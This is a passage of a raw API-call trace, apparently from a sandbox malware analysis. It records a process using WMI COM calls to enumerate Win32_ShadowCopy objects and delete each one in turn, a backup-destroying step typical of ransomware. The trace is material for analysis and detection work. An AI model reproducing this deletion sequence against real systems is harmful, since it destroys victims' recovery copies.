plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0124.963] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x53 [0124.964] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0124.964] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0124.964] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0124.964] IUnknown:Release (This=0x212498) returned 0x1 [0124.965] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c902220) returned 0x0 [0124.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902220, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0124.965] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c902220, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c903010) returned 0x0 [0124.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c903010) returned 0x0 [0124.965] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0124.966] WbemDefPath:IUnknown:AddRef (This=0x1c903010) returned 0x3 [0124.966] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0124.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b793170) returned 0x0 [0124.966] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b793170, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0124.966] WbemDefPath:IUnknown:Release (This=0x1b793170) returned 0x3 [0124.966] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0124.966] WbemDefPath:IUnknown:AddRef (This=0x1c903010) returned 0x4 [0124.966] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0124.966] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x3 [0124.966] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x2 [0124.966] WbemDefPath:IUnknown:Release (This=0x1c902220) returned 0x0 [0124.966] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x1 [0124.967] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0124.967] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0124.967] WbemDefPath:IUnknown:AddRef (This=0x1c903010) returned 0x2 [0124.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c903010) returned 0x0 [0124.967] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x2 [0124.967] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x1 [0124.967] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0124.967] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0124.967] WbemDefPath:IUnknown:AddRef (This=0x1c903010) returned 0x2 [0124.967] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c903010, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c903010) returned 0x0 [0124.967] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x2 [0124.967] WbemDefPath:IUnknown:AddRef (This=0x1c903010) returned 0x3 [0124.967] WbemDefPath:IWbemPath:SetText (This=0x1c903010, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0124.968] WbemDefPath:IUnknown:Release (This=0x1c903010) returned 0x2 [0124.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.968] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0124.968] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.968] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0124.968] SysStringLen (param_1="root\\cimv2") returned 0xa [0124.968] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0124.968] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.969] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0124.969] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.969] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0124.969] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0124.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c903010, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c903010, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c903010, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0124.972] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0124.972] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0124.972] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0124.972] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0124.972] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0124.972] IWbemClassObject:Get (in: This=0x1c907d70, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c903010, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0124.972] WbemDefPath:IWbemPath:GetText (in: This=0x1c903010, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"") returned 0x0 [0124.972] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0126.922] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0126.922] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c908420, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0126.924] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c908420) returned 0x0 [0126.924] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0126.924] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0126.924] IUnknown:AddRef (This=0x1c908420) returned 0x3 [0126.924] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0126.924] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c908428) returned 0x0 [0126.924] IMarshal:GetUnmarshalClass (in: This=0x1c908428, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0126.925] IUnknown:Release (This=0x1c908428) returned 0x3 [0126.925] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0126.925] IUnknown:AddRef (This=0x1c908420) returned 0x4 [0126.925] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0126.925] IUnknown:Release (This=0x1c908420) returned 0x3 [0126.925] IUnknown:Release (This=0x1c908420) returned 0x2 [0126.925] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0126.925] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0126.925] IUnknown:AddRef (This=0x1c908420) returned 0x3 [0126.925] IUnknown:QueryInterface (in: This=0x1c908420, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c908420) returned 0x0 [0126.925] IUnknown:Release (This=0x1c908420) returned 0x3 [0126.925] IUnknown:Release (This=0x1c908420) returned 0x2 [0126.925] IUnknown:Release (This=0x1c908420) returned 0x1 [0126.926] CoTaskMemFree (pv=0x1b77f8d0) [0126.926] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0126.926] IUnknown:AddRef (This=0x1c908420) returned 0x2 [0126.926] IWbemClassObject:Get (in: This=0x1c908420, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0126.926] IWbemClassObject:Get (in: This=0x1c908420, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0126.926] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x53 [0126.926] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0126.926] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0126.926] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0126.926] IUnknown:Release (This=0x212498) returned 0x1 [0126.927] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c9022e0) returned 0x0 [0126.927] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9022e0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0126.927] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c9022e0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c9030d0) returned 0x0 [0126.927] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c9030d0) returned 0x0 [0126.928] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0126.928] WbemDefPath:IUnknown:AddRef (This=0x1c9030d0) returned 0x3 [0126.928] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0126.928] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b7932b0) returned 0x0 [0126.928] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b7932b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0126.928] WbemDefPath:IUnknown:Release (This=0x1b7932b0) returned 0x3 [0126.928] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0126.928] WbemDefPath:IUnknown:AddRef (This=0x1c9030d0) returned 0x4 [0126.928] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0126.928] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x3 [0126.929] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x2 [0126.929] WbemDefPath:IUnknown:Release (This=0x1c9022e0) returned 0x0 [0126.929] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x1 [0126.929] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0126.929] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0126.929] WbemDefPath:IUnknown:AddRef (This=0x1c9030d0) returned 0x2 [0126.929] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c9030d0) returned 0x0 [0126.929] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x2 [0126.929] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x1 [0126.929] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0126.929] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0126.929] WbemDefPath:IUnknown:AddRef (This=0x1c9030d0) returned 0x2 [0126.929] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c9030d0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c9030d0) returned 0x0 [0126.930] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x2 [0126.930] WbemDefPath:IUnknown:AddRef (This=0x1c9030d0) returned 0x3 [0126.930] WbemDefPath:IWbemPath:SetText (This=0x1c9030d0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}\"") returned 0x0 [0126.930] WbemDefPath:IUnknown:Release (This=0x1c9030d0) returned 0x2 [0126.930] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0126.930] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0126.931] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, 